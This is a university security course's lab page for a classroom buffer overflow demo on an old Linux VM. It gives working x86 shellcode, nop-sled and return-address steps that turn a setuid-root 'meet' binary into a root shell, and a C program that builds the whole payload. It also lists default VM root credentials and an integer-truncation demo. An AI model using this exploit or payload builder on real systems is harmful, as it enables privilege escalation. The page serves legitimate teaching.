Instructor

  • who: Michael Swift
  • where: Room 7369
  • when: Monday 11-12, Thursday 1:30-2:30
  • email: swift 'at' cs.wisc.edu
Vulnerability-demo

Prerequisites

These in-class demonstrations are designed to work inside a virtual machine running (an ancient) version of Linux. We provide basic VM images for either Oracle VirtualBox or VMware. CSL Linux machines all have VirtualBox pre-installed.

VMware is only available for free on Linux and Windows; if you have VMware Fusion for Mac, that may work as well.

VM images

VirtualBox

Use the "Import" command on the file menu to create a virtual machine from these files.

If you are using a CS-supported machine:

With VirtualBox's default NAT adapter the guest cannot be reached from the host directly, so you have to enable port forwarding to access the VM over SSH from a terminal. Log into the VM and find the IP address assigned to it with:

 /sbin/ifconfig

In the VirtualBox window that lists your VMs, right-click the VM and choose Settings. In the Network tab, under Adapter 1, set 'Attached to' to NAT. Under Advanced, click Port Forwarding; this opens a window for forwarding rules. Add an entry with the following fields:

 ---------------------------------------------------------------------------------------------
 | Name      | Protocol | Host IP            | Host Port            | Guest IP   | Guest Port |
 ---------------------------------------------------------------------------------------------
 | Some name | TCP      | <loopback address> | <random port > 1024> | <IP in VM> | 22         |
 ---------------------------------------------------------------------------------------------

Example:

 ---------------------------------------------------------------------------------------------
 | Rule 1    | TCP      | 127.0.0.1          | 2222                 | 10.0.2.15  | 22         |
 ---------------------------------------------------------------------------------------------

The Guest IP field may also be left empty; VirtualBox then forwards to whatever address the guest currently holds. The host port must be above 1024 unless you run VirtualBox as root.

Save the settings and restart the virtual machine. Now SSH into the VM from a terminal with:

            ssh -p 2222 user@127.0.0.1

You can also SCP files into VM using the following command

            scp -P 2222 file1 user@127.0.0.1:~/

VMware

Image: http://pages.cs.wisc.edu/~cs642-1/assets/vmware-boxes-2.1.tar.bz2

Tips for these VM images

  • The user account username/password: `user/user`
  • The root account username/password: `root/root`

SSH access

Sometimes accessing the VM via SSH is easier (copy-paste tends to work better, and you can transfer files both ways with the scp command). Start up the VM, log in as user or root, and find the local IP address with:

  /sbin/ifconfig

Find the inet address assigned to this VM.

  inet addr:172.16.250.140

Connect via SSH:

  ssh user@172.16.250.140

If this does not work, you may need to change the VM's network settings. On VirtualBox, switch to "Host-only Adapter" in the Settings/Network dialog; with the default NAT adapter the address shown by ifconfig is not reachable from the host without the port forwarding described above.

Download the source files to a demo directory:

Copy files _TO_ the VM:

  scp demo/* user@172.16.250.140:~/

Copy files _FROM_ the VM:

  scp user@172.16.250.140:~/* demo/

Resources

This meet.c exploit demo is taken from Chapter 11 of the Ethical Hacker's Handbook. See this document if you get stuck and need more information.

Test and crash meet

Build our source

On the VM, after you've copied the source files over, compile them. These plain gcc invocations are enough only because the demo relies on the VM lacking stack canaries, a non-executable stack and ASLR (which is also why get_sp, further down, prints the same value on every run). On a modern distribution the same experiment needs gcc -m32 -fno-stack-protector -z execstack and ASLR switched off with echo 0 > /proc/sys/kernel/randomize_va_space.

  gcc -o meet meet.c
  gcc -o get_sp get_sp.c

Test and break meet

  ./meet swift H@x0r
  perl -e 'print "A"x200'
  echo $(perl -e 'print "A"x200')
  ./meet swift $(perl -e 'print "A"x200')
  ./meet swift $(perl -e 'print "A"x500')

You can substitute your name for 'swift' if you want to.

Control-flow hijack for meet.c

Setup setuid super-meet

Make a copy of meet, give it to root and mark it setuid (remember the root password is root).

  su root
  cp meet super-meet
  chown root:root super-meet
  chmod u+s super-meet
  exit

Generate shellcode

Be careful copy-pasting this command: a pasted line break adds a newline byte to the file and breaks the shellcode. Note that the bytes contain no 0x00, because the payload is passed to meet as a command-line argument, i.e. a C string, which a NUL would cut short.

  perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode

Check the length: shellcode should be 53 bytes. If not, something is wrong; maybe you accidentally added an unintended line break or some other character.

  wc -c shellcode

Get the stack pointer

  ./get_sp

Check it twice! It shouldn't change.

  ./get_sp

Compute an approximate landing spot: ESP - 0x300

(In the lines below, substitute your own ESP values.)

Stack pointer (ESP): 0xbffff672
Landing spot: 0xbffff672 - 0x300 = 0xbffff372

Convert to little-endian (least significant byte first): 0x72 0xf3 0xff 0xbf. Use perl to print these 38 times:

  perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat

Running the exploit

Run the exploit against meet first. Keep changing the size of the nop sled until the repeated return address lines up with the saved return address on the stack: try 200, 201, 202, and so on. The address is four bytes wide, so four consecutive sled sizes cover every possible alignment.

  ./meet swift $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)

Check that super-meet is marked setuid (an 's' in place of the owner's 'x' in the permissions):

 ls -l

Check your id; it should be user (uid 1000):

  id

Run the exploit against super-meet. If you get a shell, check your uid with `id`: it should now report root, since super-meet runs with an effective uid of 0 and the shellcode's setuid(0) call makes that the real uid as well.

  ./super-meet swift "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"
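The perl and cat steps above, gathered into one small program, as an added example (my own code, not part of the course demo or the handbook). It assumes exactly what the steps assume: a 32-bit x86 target, the ESP value printed by get_sp, a landing spot of ESP - 0x300, the 53-byte shellcode from the page and 38 copies of the return address; the file name mkpayload.c and the 4096-byte output buffer are mine. It also checks what the wc -c step cannot: that no byte of the payload is NUL, since an argv string ends at the first NUL.

```c
/*
 * mkpayload.c: build the meet/super-meet overflow payload in one step.
 * Added illustration, not part of the course demo; it replaces the
 * perl/cat pipeline above. Assumptions: 32-bit x86 target, ESP as printed
 * by get_sp, landing spot ESP - 0x300, the 53-byte shellcode from the page,
 * return address repeated 38 times.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP            0x90   /* x86 one-byte nop */
#define LANDING_DELTA  0x300  /* how far below get_sp's ESP we aim */
#define RET_REPEATS    38     /* copies of the return address after the shellcode */

/* setuid(0); execve("/bin/sh"); exit(0): the same bytes the perl line emits.
 * There is no 0x00 byte: registers are zeroed with xor, and the NUL that
 * terminates "/bin/sh" is written at run time (mov [esi+7], al). */
static const unsigned char shellcode[] = {
    0x31, 0xc0, 0x31, 0xdb, 0xb0, 0x17, 0xcd, 0x80, /* xor eax,eax; xor ebx,ebx; mov al,23; int 0x80: setuid(0) */
    0xeb, 0x1f, 0x5e,                               /* jmp to the call below; pop esi = &"/bin/sh" */
    0x89, 0x76, 0x08, 0x31, 0xc0, 0x88, 0x46, 0x07, /* argv[0] = esi; NUL-terminate "/bin/sh" */
    0x89, 0x46, 0x0c, 0xb0, 0x0b, 0x89, 0xf3,       /* argv[1] = NULL; eax = 11 (execve); ebx = esi */
    0x8d, 0x4e, 0x08, 0x8d, 0x56, 0x0c, 0xcd, 0x80, /* ecx = &argv; edx = &envp; int 0x80 */
    0x31, 0xdb, 0x89, 0xd8, 0x40, 0xcd, 0x80,       /* exit(0) if execve returns */
    0xe8, 0xdc, 0xff, 0xff, 0xff,                   /* call back to the pop, pushing &"/bin/sh" */
    '/', 'b', 'i', 'n', '/', 's', 'h'
};
#define SHELLCODE_LEN (sizeof shellcode)

/* The payload is handed to meet through argv, i.e. as a C string, so a
 * single NUL byte would truncate it. Returns 1 if there is none. */
int nul_free(const unsigned char *p, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (p[i] == 0)
            return 0;
    return 1;
}

/* Approximate landing spot inside the nop sled, as on the page: ESP - 0x300. */
uint32_t landing_addr(uint32_t esp)
{
    return esp - LANDING_DELTA;
}

/* x86 is little-endian: 0xbffff372 is stored in memory as 72 f3 ff bf. */
void pack_le32(uint32_t v, unsigned char out[4])
{
    out[0] = v & 0xff;
    out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff;
    out[3] = (v >> 24) & 0xff;
}

/* Layout: [nops x 0x90][shellcode][ret x RET_REPEATS].
 * Returns the number of bytes written, or 0 if buf cannot hold them. */
size_t build_payload(unsigned char *buf, size_t cap, size_t nops, uint32_t ret)
{
    size_t total = nops + SHELLCODE_LEN + 4 * (size_t)RET_REPEATS;
    unsigned char le[4];
    int i;
    if (total > cap)
        return 0;
    memset(buf, NOP, nops);
    memcpy(buf + nops, shellcode, SHELLCODE_LEN);
    pack_le32(ret, le);
    for (i = 0; i < RET_REPEATS; i++)
        memcpy(buf + nops + SHELLCODE_LEN + 4 * (size_t)i, le, 4);
    return total;
}

/* Usage: ./mkpayload <esp from get_sp, hex> <nop sled size>
 * e.g.   ./super-meet swift "$(./mkpayload 0xbffff672 200)" */
int main(int argc, char **argv)
{
    unsigned char buf[4096];   /* assumed upper bound for this demo */
    uint32_t esp;
    size_t nops, n;
    if (argc != 3) {
        fprintf(stderr, "usage: %s <esp hex> <nops>\n", argv[0]);
        return 1;
    }
    esp = (uint32_t)strtoul(argv[1], NULL, 16);
    nops = strtoul(argv[2], NULL, 10);
    n = build_payload(buf, sizeof buf, nops, landing_addr(esp));
    if (n == 0 || !nul_free(buf, n)) {
        fprintf(stderr, "payload too large or contains a NUL byte\n");
        return 1;
    }
    fwrite(buf, 1, n, stdout);
    return 0;
}
```

Compile it on the VM with gcc -o mkpayload mkpayload.c (it is ordinary C that only emits bytes, so it needs none of the build flags the target does) and run ./super-meet swift "$(./mkpayload 0xbffff672 200)", stepping the second argument through 201, 202, ... exactly as above. Command substitution strips trailing newlines, which is harmless here because the payload ends in 0xbf.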

Test the integer overflow vulnerability

  gcc -o width width.c
  ./width 5 "Hello there"
  ./width 85 "Hello there"
  ./width 65536 "Hello there"
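An added illustration of the bug class the width test exercises (my own program, not the course's width.c, whose source is not on this page): a width read from argv is narrowed to 16 bits before the bounds check, so 65536 passes as 0 while the full value is what would size the write. The 80-column buffer, the padding behaviour and the function names are assumptions; the hardened version beside it parses with strtol and checks the value in the type that is actually used.

```c
/*
 * Added illustration of a width-truncation bug, not the course's width.c.
 * Assumptions: an 80-column output buffer and "pad the text to <width>
 * columns" semantics.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define COLS 80   /* assumed: the output line buffer holds 80 characters */

/* Vulnerable pattern: the bounds check is done on a 16-bit copy of the
 * width, but the full int is what would later size the memset/strncpy.
 * 65536 narrows to 0 and passes; 65616 narrows to 80 and passes too.
 * Returns 1 if the width is accepted. */
int accepts_width_vuln(int width)
{
    unsigned short w = (unsigned short)width;   /* the truncation */
    return w <= COLS;
}

/* Hardened: parse with strtol, reject junk, negatives and anything wider
 * than the buffer, and hand back the checked value in the type used. */
int accepts_width_safe(const char *arg, size_t *out)
{
    char *end;
    long v;
    errno = 0;
    v = strtol(arg, &end, 10);
    if (errno != 0 || end == arg || *end != '\0')
        return 0;
    if (v < 0 || v > COLS)
        return 0;
    *out = (size_t)v;
    return 1;
}

/* Pad (or cut) s to exactly width columns in out[COLS + 1].
 * Returns the width used, or -1 if the argument was rejected. */
int pad_to_width(char out[COLS + 1], const char *arg, const char *s)
{
    size_t width, n;
    if (!accepts_width_safe(arg, &width))
        return -1;
    n = strlen(s);
    if (n > width)
        n = width;               /* shorten the text, never overrun the buffer */
    memcpy(out, s, n);
    memset(out + n, ' ', width - n);
    out[width] = '\0';
    return (int)width;
}

int main(int argc, char **argv)
{
    char line[COLS + 1];
    int w;
    if (argc != 3) {
        fprintf(stderr, "usage: %s <width> <text>\n", argv[0]);
        return 1;
    }
    w = pad_to_width(line, argv[1], argv[2]);
    if (w < 0) {
        fprintf(stderr, "width must be between 0 and %d\n", COLS);
        return 1;
    }
    printf("[%s]\n", line);
    return 0;
}
```

The three page arguments map directly onto the vulnerable check: 5 is accepted, 85 is rejected, and 65536 is accepted because it wraps to 0 in an unsigned short. The fix is not a bigger integer type but comparing and using the same value, parsed with an error-checked routine rather than atoi.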

Issues

If you find any problems with this demo: send me an email, file an issue, or better yet, just send me a pull request.

Page last modified on February 10, 2019, at 12:18 AM